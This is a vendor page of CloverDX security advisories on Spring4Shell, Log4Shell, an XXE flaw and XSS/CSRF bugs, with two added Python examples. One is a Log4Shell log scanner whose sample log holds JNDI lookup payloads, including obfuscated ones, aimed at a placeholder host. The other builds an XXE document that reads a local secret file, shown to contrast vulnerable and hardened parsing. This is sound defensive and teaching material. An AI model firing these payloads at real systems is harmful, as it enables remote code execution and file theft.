Refer to this board to find the latest security advisories for the CloverDX Data Integration Platform.
For inquiries please contact us at firstname.lastname@example.org.
CloverDX Security Advisories
Security Advisory April 2022 - Spring4Shell
A fix is available for all supported CloverDX versions; the advisory includes details of the fix.
This advisory discloses one critical severity vulnerability in the Spring Framework and provides an overview of its impact on CloverDX products.
The vulnerability (CVE-2022-22965, also known as Spring4Shell) is a remote code execution (RCE) vulnerability in Spring Framework, which CloverDX uses as one of the technologies powering CloverDX Server Console. An attacker abuses Spring's data binding (the mapping of HTTP request parameters onto Java object properties) to reach properties that were never meant to be writable from a request, such as the class loader, and from there execute arbitrary code on the target system. The known exploit path requires the application to run on JDK 9 or later.
Security Advisory December 2021
As of 22 February 2022, CloverDX has addressed all vulnerabilities related to Log4j.
Please read the advisory for the available maintenance releases and the update steps.
This advisory discloses several critical, high and medium severity security vulnerabilities in Apache Log4j 2, the first and most severe of which (CVE-2021-44228) is commonly known as "Log4Shell", and provides an overview of their impact on CloverDX products. These vulnerabilities allow an attacker who can get a crafted string into a logged message (for example through an HTTP header or request parameter) to trigger JNDI lookups and other Log4j features and, in the worst case, execute arbitrary code.
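The detection side of the paragraph above, as an added example that is not CloverDX code: a scanner for the `${jndi:...}` lookup strings that exploit attempts leave in web server and application logs. Naive rules that grep for the literal `${jndi:` miss the obfuscated forms seen in the wild, which nest Log4j's own `lower`, `upper` and default-value (`${name:-default}`) lookups to spell the prefix out at runtime, or URL-encode the payload in a request path. The scanner evaluates those inner lookups the way Log4j would and only then matches. The log lines are constructed for the example; the IP addresses and paths are placeholders.

```python
"""Detect Log4Shell-style ${jndi:...} lookups in log lines, including the
obfuscated forms used to evade simple grep rules.
Added example, not CloverDX code; the sample log is constructed."""
import re
from urllib.parse import unquote

# Innermost ${...} lookup: nothing nested inside the braces.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# What we are really looking for once obfuscation is undone. Log4j lookup
# prefixes are matched case-insensitively, so JnDi counts too.
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

# Constructed access-log lines: 1 and 6 are benign, 2-5 are exploit attempts.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET /clover/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Dec/2021:12:00:02 +0000] "GET /clover/ HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"
10.0.0.9 - - [10/Dec/2021:12:00:03 +0000] "GET /clover/ HTTP/1.1" 200 512 "-" "${${lower:j}${upper:n}di:rmi://198.51.100.7:1099/b}"
10.0.0.9 - - [10/Dec/2021:12:00:04 +0000] "GET /clover/ HTTP/1.1" 200 512 "-" "${${env:NOPE:-j}ndi:${::-l}dap://198.51.100.7/c}"
10.0.0.9 - - [10/Dec/2021:12:00:05 +0000] "GET /clover/?q=%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.7%2Fd%7D HTTP/1.1" 200 512 "-" "curl/7.79"
10.0.0.5 - - [10/Dec/2021:12:00:06 +0000] "GET /clover/docs/${date:yyyy} HTTP/1.1" 404 0 "-" "Mozilla/5.0"
"""


def _evaluate_lookup(token: str) -> str:
    """Statically evaluate one innermost Log4j lookup the way Log4j 2 would."""
    if ":-" in token:
        # ${name:-default} yields "default" when the lookup fails; ${::-j}
        # and ${env:NOPE:-j} are common ways to spell out "jndi".
        return token.split(":-", 1)[1]
    kind, sep, value = token.partition(":")
    if sep:
        kind = kind.lower()
        if kind == "lower":
            return value.lower()
        if kind == "upper":
            return value.upper()
    # Any other lookup (jndi:, date:, env:, ...) is left in place.
    return "${" + token + "}"


def normalize_lookups(text: str, max_rounds: int = 20) -> str:
    """Undo URL encoding, then resolve nested lower/upper/default lookups
    from the inside out until the string stops changing."""
    text = unquote(text)
    for _ in range(max_rounds):
        new = _INNER.sub(lambda m: _evaluate_lookup(m.group(1)), text)
        if new == text:
            break
        text = new
    return text


def is_jndi_lookup(line: str) -> bool:
    """True if the line carries a JNDI lookup after de-obfuscation."""
    return _JNDI.search(normalize_lookups(line)) is not None


def scan_log(log_text: str) -> list:
    """Return the 1-based numbers of lines flagged as JNDI lookup attempts."""
    return [i for i, line in enumerate(log_text.splitlines(), 1)
            if is_jndi_lookup(line)]


if __name__ == "__main__":
    for n in scan_log(SAMPLE_LOG):
        print(f"line {n}: {normalize_lookups(SAMPLE_LOG.splitlines()[n - 1])}")
```

Line 6 is deliberately included: `${date:yyyy}` is a lookup too, and a rule that flags every `${` would page on it. Whatever the detector says, a flagged line only proves an attempt; confirming impact means checking whether the logging host made the outbound LDAP or RMI connection named in the payload.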
Security Advisory November 2021 (last update date: 29-November-2021)
This advisory discloses one medium severity security vulnerability in CloverDX Server. The vulnerability (CVE-2021-42776) is an XXE (XML External Entity) vulnerability in CloverDX Server Console. In an XXE vulnerability the XML parser resolves external entities declared in user-supplied input, so a user of the console can declare an entity that points at a local file on the CloverDX Server host and read its contents through the parser, even where that user could not otherwise access the file.
The vulnerability is fixed by upgrading to a newer version of CloverDX Server, as described in the Fixed product versions section of the advisory.
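The mechanism behind the XXE advisory above, as an added example that is not CloverDX code and does not reproduce the CloverDX issue itself: the same XML document is parsed twice, once with external entity resolution switched on (the vulnerable configuration) and once with it off. Python's `xml.sax` is used so the example runs stand-alone; CloverDX Server is a Java application, where the equivalent switches are the `http://xml.org/sax/features/external-general-entities` feature and, more robustly, `http://apache.org/xml/features/disallow-doctype-decl` on the parser factory. The "secret" file is created by the example and deleted afterwards.

```python
"""Vulnerable vs hardened parsing of XML that declares an external entity.
Added example, not CloverDX code; the secret file and the XML are constructed."""
import io
import os
import tempfile
import xml.sax
import xml.sax.handler
from xml.sax.xmlreader import InputSource


class _TextCollector(xml.sax.handler.ContentHandler):
    """Collects all character data the parser reports."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)


def parse_text(xml_bytes: bytes, resolve_external_entities: bool) -> str:
    """Parse the document and return its text content.

    resolve_external_entities=True is the vulnerable setting: SYSTEM entities
    are fetched from the file system (or network) and inlined into the
    document. False leaves them empty, which is what a hardened parser does.
    """
    parser = xml.sax.make_parser()
    parser.setFeature(xml.sax.handler.feature_external_ges,
                      resolve_external_entities)
    collector = _TextCollector()
    parser.setContentHandler(collector)
    source = InputSource()
    source.setByteStream(io.BytesIO(xml_bytes))
    parser.parse(source)
    return "".join(collector.chunks).strip()


def build_xxe_document(target_path: str) -> bytes:
    """Attacker-style document: the entity points at a local file, and the
    reference inside <name> makes the parser copy the file's contents there."""
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE job [<!ENTITY xxe SYSTEM "{target_path}">]>\n'
        "<job><name>&xxe;</name></job>\n"
    ).encode()


def xxe_demo() -> tuple:
    """Return (what the vulnerable parser leaks, what the hardened parser yields)."""
    # Constructed stand-in for a configuration file the user is not allowed to read.
    with tempfile.NamedTemporaryFile("w", suffix=".properties", delete=False) as f:
        f.write("db.password=s3cr3t")
        secret_path = f.name
    try:
        doc = build_xxe_document(secret_path)
        return parse_text(doc, True), parse_text(doc, False)
    finally:
        os.unlink(secret_path)


if __name__ == "__main__":
    leaked, hardened = xxe_demo()
    print("vulnerable parser returned:", repr(leaked))
    print("hardened parser returned:  ", repr(hardened))
```

Disabling entity resolution is the minimum; the entity declaration still needs a DOCTYPE, so rejecting any document that carries one closes this class of bug outright (and the related entity-expansion denial of service) for an API that never legitimately needs a DTD.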
Security Advisory April 2021 (last update date: 12-April-2021)
This advisory discloses two high severity security vulnerabilities in CloverDX Server. The first (CVE-2021-29995) is a cross-site scripting (XSS) vulnerability in the CloverDX Server Simple HTTP API; the second (CVE-2021-30133) is a cross-site request forgery (CSRF) vulnerability in CloverDX Server. See the advisory for details.
Both vulnerabilities affect the same versions of CloverDX Server and are fixed by upgrading to a newer CloverDX release, as detailed in the advisory.